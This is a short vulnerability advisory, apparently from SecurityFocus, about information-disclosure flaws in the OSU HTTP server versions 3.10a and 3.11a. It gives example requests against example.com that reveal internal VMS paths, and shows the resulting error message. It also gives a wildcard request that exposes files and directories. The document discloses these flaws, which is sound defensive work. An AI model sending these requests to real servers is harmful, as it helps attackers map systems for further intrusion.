19 lines
No EOL
645 B
Text
19 lines
No EOL
645 B
Text
source: http://www.securityfocus.com/bid/20098/info
|
|
|
|
OSU (Ohio State University) HTTP server is prone to multiple information-disclosure vulnerabilities.
|
|
|
|
This may allow a malicious user to gain access to sensitive data; information gained may aid in further attacks.
|
|
|
|
Versions 3.11a and 3.10a are vulnerable; other versions may also be affected.
|
|
|
|
Path-Disclosure
|
|
http://www.example.com/NONEXISTANT
|
|
|
|
Error:
|
|
File /staff$disk/www_server/home/NONEXISTANT (/NONEXISTANT) could
|
|
not be opened VMS especification:
|
|
staff$disk:[www_server.home]NONEXISTANT index.url present
|
|
|
|
|
|
File- and Directroy-Disclosure
|
|
http://www.example.com/a*/ |